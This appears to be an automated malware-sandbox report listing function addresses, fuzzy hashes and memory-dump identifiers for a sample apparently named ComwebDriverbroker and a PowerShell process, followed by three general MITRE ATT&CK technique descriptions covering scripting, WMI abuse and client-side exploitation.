Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34d00000_ComwebDriverbroker.jbxd

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: d904e8b85cb28670d65dfa0e28018d4d45d65c54c934cfd882c4bda44e7dbd24
Instruction ID: 94d76376fb6f1fc6f8dc44582e7b3a0d17669fa4a3f4561155947494aca3412c
Opcode Fuzzy Hash: d904e8b85cb28670d65dfa0e28018d4d45d65c54c934cfd882c4bda44e7dbd24
Instruction Fuzzy Hash: D3819230618A8C4FDB69DF18D8997F937E1FB69311F04427EE84EC7292CA75A845CB81

Function 00007FFD348A08E8 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5df8704ef91b623520d84410b98cd9d4a8e75887652916f5485d23cbdb12fd80
Instruction ID: 5a9bf4e902095860ce0e4053c0480e331d55eac1f70743ca3e0b19379ee3dffd
Opcode Fuzzy Hash: 5df8704ef91b623520d84410b98cd9d4a8e75887652916f5485d23cbdb12fd80
Instruction Fuzzy Hash: 4F31453170C9184FD768EB5CE89A9B977D0EF8632030501BBE18AC7166ED21AC828781

Function 00007FFD348A090D Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8879d80012ccf60776a4a477e14060e7b4f1cf0461fd04a86d60997cfb16fd23
Instruction ID: 11b16168867e98a8a6eb711c58f4848bd2ba77d646c402cf48fa6780443dd4a9
Opcode Fuzzy Hash: 8879d80012ccf60776a4a477e14060e7b4f1cf0461fd04a86d60997cfb16fd23
Instruction Fuzzy Hash: 81312612B0CA651BE364B3FC20BA2FA6B99DF45325B0854BFD14DC70D3EDAC78418284

Function 00007FFD348A0C25 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0895a69925d157b7f68402d67529da8786e8fe87f9503f7e9a6d64261b400f5a
Instruction ID: 9d626131928b2a34f199ffd50ca0f8763368bd15810e62be8ab998c32952e931
Opcode Fuzzy Hash: 0895a69925d157b7f68402d67529da8786e8fe87f9503f7e9a6d64261b400f5a
Instruction Fuzzy Hash: C731F732B0E6559FE752AFA898A12EC7BA0EF43310F0841B7D248DB1C3DA7C35499791

Function 00007FFD348A0998 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7efdb734fb587d7904875db130cacdc589d3b672ef4b6e8bf05a3ddbae09916
Instruction ID: de69321992d54c6b0acaa020c711eda348e5163735b93fbd25842b9e07a9eb9c
Opcode Fuzzy Hash: b7efdb734fb587d7904875db130cacdc589d3b672ef4b6e8bf05a3ddbae09916
Instruction Fuzzy Hash: 09210820B2D9590FE7D8F76C54AA6B573C6EB89316B5400BDE50DC32D3DD6CAC018394

Function 00007FFD348A10BD Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75998dff25ac315057ba906e890152267e804d88b0a4f2a7ff62a2d4fa841b84
Instruction ID: c8345b0093a1ec3610f8e46d8af15eaaa506ee7581e30757441568cd6acfaebe
Opcode Fuzzy Hash: 75998dff25ac315057ba906e890152267e804d88b0a4f2a7ff62a2d4fa841b84
Instruction Fuzzy Hash: 1B012615A8E6D20FD76A57B08CB15A23FD4DF8721030A01FAD189CB5E3C88D6886C371

Function 00007FFD348A0C38 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0152f4d9c83a25baf54259c61ae78e6043b364cdbeec103fc4d6abcc168708d
Instruction ID: c152597f5cb46760600d8bbe4e9a2eaeccffb855caab5871f05533c1c1d91dfe
Opcode Fuzzy Hash: e0152f4d9c83a25baf54259c61ae78e6043b364cdbeec103fc4d6abcc168708d
Instruction Fuzzy Hash: 3811E031B0E6899FE742DFA888A11AD7BB0EF43310F0440B7C244DB183E97C260A97A0

Function 00007FFD348A2196 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042fb1b5bf316e81a29543029491d7824b314bd87c51254bf94dd3c5df29f4
Instruction ID: 92bdbabde577f2c3ca68039299832184ed25eb6e4583a691298b3153e239f844
Opcode Fuzzy Hash: 48042fb1b5bf316e81a29543029491d7824b314bd87c51254bf94dd3c5df29f4
Instruction Fuzzy Hash: 8C11A121F0D91A4FE7F4AB1888A47B862D2FF4B310F1505B9DA0DE3392DD6C6D515650

Function 00007FFD348A0C40 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2182e6fd14bbab2e92be23739cdba2517985e4bd40eb5a596a995b42210959b2
Instruction ID: c390314e3fcaf2d5aa08cfc6552bb2b89af1aea2eb916d7f741ac3954e66ef4b
Opcode Fuzzy Hash: 2182e6fd14bbab2e92be23739cdba2517985e4bd40eb5a596a995b42210959b2
Instruction Fuzzy Hash: 6811ED31F0E6899FE742DFA888A01AD7FB0EF43310F0440B7C244DB292D97C6609A7A0

Function 00007FFD348A21DF Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94f8093c9218f2d8e78a04bcc07dcd38722e3822fb8cff8e9468410f5d9b64db
Instruction ID: 96ee5769b679a73c660dc5028fb265c1faec68e303c1bdcd3bf042379a6f27e0
Opcode Fuzzy Hash: 94f8093c9218f2d8e78a04bcc07dcd38722e3822fb8cff8e9468410f5d9b64db
Instruction Fuzzy Hash: 7C017121B0D5064FEAA8EB2885A46B423D2EF97314F0944B9D64ED3392DD5CAC419610

Function 00007FFD348A0C48 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eef8578a46a9af1ea8e849ba4fe3fda902f900d77927468a0c086dee65c2014
Instruction ID: 01a8839fdbfc7a403dfc5cfc94b24fe97d900b472c6cda11d4bd9f4724ce1ccd
Opcode Fuzzy Hash: 5eef8578a46a9af1ea8e849ba4fe3fda902f900d77927468a0c086dee65c2014
Instruction Fuzzy Hash: FF01CC31E0E2899FE752DFA888A019D7FB0AF03310F1841F7C144DB292E97C6A499791

Function 00007FFD348A22DC Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc148dbf662e30a02452df980cc057f91d7ebef1e668622100c710c19570b35c
Instruction ID: 4d2fbd350a440f84a104af65a3cf789ce743ff9465590958979c95c760a2a787
Opcode Fuzzy Hash: dc148dbf662e30a02452df980cc057f91d7ebef1e668622100c710c19570b35c
Instruction Fuzzy Hash: 35018630E0951A8AEBE8EB04C9A46F873A1EF56310F1441B9D64DE3292CE6C2D929A50

Function 00007FFD348A0C50 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ad6bf649a987e880df7c9961ce8f58559247e8efe5268b143d61ac8c78e241c
Instruction ID: 5fa59039b08a5e7dbc8f6187173d7c64b09fb29096f53b8103a3f553ba124184
Opcode Fuzzy Hash: 0ad6bf649a987e880df7c9961ce8f58559247e8efe5268b143d61ac8c78e241c
Instruction Fuzzy Hash: 52017C34E0E2899FEB52DFA488A01AD7FB0AF17310F1841F7C144DB293E97C6A449791

Function 00007FFD348A1BF5 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3a3145a8cc0cca49cb5365344aee1a144b405855059aaaad882463cabb26a28
Instruction ID: 6aa1346133ceb6c68c794bf6d64dbb67fee981279f79216f157b84df36c5cd1e
Opcode Fuzzy Hash: f3a3145a8cc0cca49cb5365344aee1a144b405855059aaaad882463cabb26a28
Instruction Fuzzy Hash: EFF03134908A19CFCB59EB08C895ED973B1FBA8300F404299C00DD32A0DB34AD45CF85

Function 00007FFD348A2297 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c46ea603e063733b556758c503ea7291f1ea7d7e0d7bee4be7e80b568c24785
Instruction ID: 39e86f2547e8ba5c9a832baf96e151546b0c624ab38741e3b7959469107a6b69
Opcode Fuzzy Hash: 2c46ea603e063733b556758c503ea7291f1ea7d7e0d7bee4be7e80b568c24785
Instruction Fuzzy Hash: 74F0B420F0D5164AEBE8EB08C9A47B82391EF47314F1441B9DA8DE32E2CD5C7D929650

Function 00007FFD348A10F0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3f6eb1fc8ed8d435a57b546d9b793326fd5ddd335e12319a6d9fae8767ef585
Instruction ID: 245fbb4711d72d9f799385a115b2bf5067e587e9728c7110be5de61ebb068e38
Opcode Fuzzy Hash: c3f6eb1fc8ed8d435a57b546d9b793326fd5ddd335e12319a6d9fae8767ef585
Instruction Fuzzy Hash: B3E08625B5CC5907DBBCA6B468B25B172C4EB86315706117AD05AC76C2CD5D6C814381

Function 00007FFD348A1E69 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8dbdc470634388db7184830992addb0184feaf3c0037eb38fe14913a3057470
Instruction ID: 0c0eeb43e2dabf465e852dc909bb55fc0ed09ed208666bf93e8f92dd13f9e8ce
Opcode Fuzzy Hash: b8dbdc470634388db7184830992addb0184feaf3c0037eb38fe14913a3057470
Instruction Fuzzy Hash: 03E01260F0D4168AFB949754D4A17A96254EB95300F1800B8DB5ED33C2CD6CAD05A665

Function 00007FFD348A0B95 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd0543b9d0adc4329eb618c7f976545b6d033392820df751358e15f734ce46fd
Instruction ID: 9f25f1eb851faae3719fcb0c590fd766797f2a39112392b9654cae562a392a98
Opcode Fuzzy Hash: cd0543b9d0adc4329eb618c7f976545b6d033392820df751358e15f734ce46fd
Instruction Fuzzy Hash: 6BD0A73065954A4FE641F738D8999647BD0FF1F210BD914E1D008C7561D50488558B00

Function 00007FFD348A06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a1ca0eed7eef7795817160075d15c470614e9d3c31617ba283944c6d80d9c0
Instruction ID: 9ad1f51489f30d8f993ef6f1e1988b1ce8dfd1fc31e902534d2ffb7761be0d01
Opcode Fuzzy Hash: 01a1ca0eed7eef7795817160075d15c470614e9d3c31617ba283944c6d80d9c0
Instruction Fuzzy Hash: 42C04C05F5BA1B01B8D57B6E58E60ACA1406BDB714FDD1572D74CE00C1ACCD20D92177

Function 00007FFD348A12E8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b46257708f436c5923578b8ae170b8e8b194bd4aeb4b50011f654afdbe41f5c
Instruction ID: 286120e347c69df67b64f5a9e5f6927b96789ea5b58ad7a19575c01af8d45f32
Opcode Fuzzy Hash: 2b46257708f436c5923578b8ae170b8e8b194bd4aeb4b50011f654afdbe41f5c
Instruction Fuzzy Hash: 13C04C345518498FCA88EB29C89595577A0FB1E215BD50090E409C7171D659DCD5DB41

Function 00007FFD348A0B18 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b06f1791d9c404b6da8188d13b2bf43d86fda8b6c16fb441b2d0ee5fe7e0b47f
Instruction ID: e5be40d59e392315561f5dbc1776778831372473e5dc02255067d5ec3746d79a
Opcode Fuzzy Hash: b06f1791d9c404b6da8188d13b2bf43d86fda8b6c16fb441b2d0ee5fe7e0b47f
Instruction Fuzzy Hash: 28C04C305118198FCA44E72DC98595476E1FB0E215BD60190E50DC7171E65ADC95D741

Function 00007FFD348A5322 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad9db875ba8a3fee9158522674610f1e13a0f77cfc21aad9f255b19adac591fc
Instruction ID: 06e94c20953cafdf85b832d7bfe6a06cf791e9987c0d176757c8d7b5973bae83
Opcode Fuzzy Hash: ad9db875ba8a3fee9158522674610f1e13a0f77cfc21aad9f255b19adac591fc
Instruction Fuzzy Hash: 9AC04C05F2983A5AF76A7354443127D085A5F45704F9D5574E00ED77CECEAC6E0212CA

Function 00007FFD348A06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5377d297c480efdd9ac09c8813067c0891aca681d456493c417e87b77effbb76
Instruction ID: bbfdf9f7ab789dc0650e8abf64c67cf80a2db346f6bd4d2a596c736e449828a1
Opcode Fuzzy Hash: 5377d297c480efdd9ac09c8813067c0891aca681d456493c417e87b77effbb76
Instruction Fuzzy Hash: D5B00204D6784F01A4D577BE19D606574906B4B314FD91570D74DD0185A8CD25992267

Function 00007FFD348A1872 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c4d7336dbb50305e01d20c5160489b72e76bde66bb8cf5a48265a4d6db539bf
Instruction ID: 984bc1cf04f126cd0a42e4c054fad1ce9c302cbf5a2fd30cff9c21eb21afc52a
Opcode Fuzzy Hash: 3c4d7336dbb50305e01d20c5160489b72e76bde66bb8cf5a48265a4d6db539bf
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 5044, Parent PID: 3536COMMON

Executed Functions

Function 00007FFD34899748 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.3731667814.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 334f7238eefecf78d814869e8b07c37853bd3162847b273f95d75ba70bf7987e
Instruction ID: 9b1806cd82543fefabd8ff5bae0ebfb78134aa40730be248835f1401825d322f
Opcode Fuzzy Hash: 334f7238eefecf78d814869e8b07c37853bd3162847b273f95d75ba70bf7987e
Instruction Fuzzy Hash: 45411831A0DF889FDB189F5C98562A8BFE0FB55310F04416FE049D3252DB24A856CBC2

Function 00007FFD3489A73C Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.3731667814.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b166fd9c6c41c1a6ce0f63bc267e915c376a75727ecb52e4306c2916e825a1ae
Instruction ID: 18c5472eb71ccfd3b0582c0635bad66d9d1526f3ab09245f3c851a36118b91c3
Opcode Fuzzy Hash: b166fd9c6c41c1a6ce0f63bc267e915c376a75727ecb52e4306c2916e825a1ae
Instruction Fuzzy Hash: 7D314831A0DB8C4FEB55DBA8985A6E97FE0EF57320F0441BFD049C7153DA686806C752

Function 00007FFD3477ED40 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.3706621281.00007FFD3477D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3477D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd3477d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13e9f6cb9b6ce5a60587207a04ceb104ec1eb4c33fc667658816f0d8656dbf06
Instruction ID: a4304c90c22936810d82e79cce13300c624b135d82c20eaf637e8e540aeb2c1a
Opcode Fuzzy Hash: 13e9f6cb9b6ce5a60587207a04ceb104ec1eb4c33fc667658816f0d8656dbf06
Instruction Fuzzy Hash: D641277040DBC48FE7578B389C919623FF0EF57220B1945DFD088CB1A3D629A84AC792

Function 00007FFD3496681E Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.3772193616.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d46fb3908532f9548f2bd5ce304e1727849c229d65b170c5d08121754eb111d
Instruction ID: 7433853ee94145341a61859e744b88472ff9019c1eda1624aaa7714be343245c
Opcode Fuzzy Hash: 2d46fb3908532f9548f2bd5ce304e1727849c229d65b170c5d08121754eb111d
Instruction Fuzzy Hash: 67110672F0D6894FEB55EAA854E41A87BD2EF5A324B0841BEC54CD7097CD2DAC45C360

Function 00007FFD348933B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.3731667814.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: ae605e7e7b896741c28386b595f310dc01aebb4b8afea9650844b96dbb4c98a5
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: A401A73020CB0C4FD744EF0CE451AA6B7E0FB89320F10052DE58AC3651DA36E882CB41

Function 00007FFD34899CF8 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.3731667814.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 220d2dd5f9a231acdc084c553f7dca791fc48c3d77790c44524dae23965d90d4
Instruction ID: e4dfad910df2213a6bc90cf42ba41f4d54d5e40fec46e39fdaf81e6ba806872a
Opcode Fuzzy Hash: 220d2dd5f9a231acdc084c553f7dca791fc48c3d77790c44524dae23965d90d4
Instruction Fuzzy Hash: 75F0BB31808A894FDB46DF2888595D5BFA0EF17310F1502D7D459C71A2DB659458CB82

Function 00007FFD3496414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.3772193616.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aec5a71c9478152392ce09b7dad14cdcf27230761ee599b352acbd541cbaeab4
Instruction ID: 7f3fb69f29427ba92c70fee5b3b5447a6ac3ed05d450c412b44e809de44a255b
Opcode Fuzzy Hash: aec5a71c9478152392ce09b7dad14cdcf27230761ee599b352acbd541cbaeab4
Instruction Fuzzy Hash: 59F09A32B4D5048FD768EA8CE4908E873E1EF6633071200BAE25DC71A7CA2AEC44CB55

Function 00007FFD34964400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.3772193616.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9532d6002141f37736eb820d59887eb09b173494bcec2ad724e3b50415bb88c0
Instruction ID: cb192d07a840a015af20e1d2afd71459e14db71ce9212023a30ce7ed193f744a
Opcode Fuzzy Hash: 9532d6002141f37736eb820d59887eb09b173494bcec2ad724e3b50415bb88c0
Instruction Fuzzy Hash: FFF0BE32A4D5448FDB55EB8CE0914E877E0FF0633474100BAE64DC70A7DA2AAC44CB50

Function 00007FFD349641D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.3772193616.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: 58f1382bb6993b943f8ab3d8c690b4bd7c13bec444ad5981856bae3d5ed08961
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: A8E01A31B0C818CFDA68DA4CE090DE973E1EBA933171201BBD24EC7565CA2AEC519B94

Non-executed Functions

Function 00007FFD348985D3 Relevance: 5.2, Strings: 4, Instructions: 224COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFD34898562
N_^, xrefs: 00007FFD348985C2
N_^, xrefs: 00007FFD34898572
N_^, xrefs: 00007FFD3489867A

Memory Dump Source

Source File: 00000027.00000002.3731667814.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^
API String ID: 0-3900292545
Opcode ID: ade0af827da8cf36323d0b9bb10615e86b6a2778a08ce0f6430d8949dfe6e67c
Instruction ID: 7b9d367eb811c326037b86c657511033c670b11649c4899c52077934de6cbc81
Opcode Fuzzy Hash: ade0af827da8cf36323d0b9bb10615e86b6a2778a08ce0f6430d8949dfe6e67c
Instruction Fuzzy Hash: E061C453E1DEC35BF36247295CBA0996FD0EF13364B5D08B6C79ACB093ED1D2806A252

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

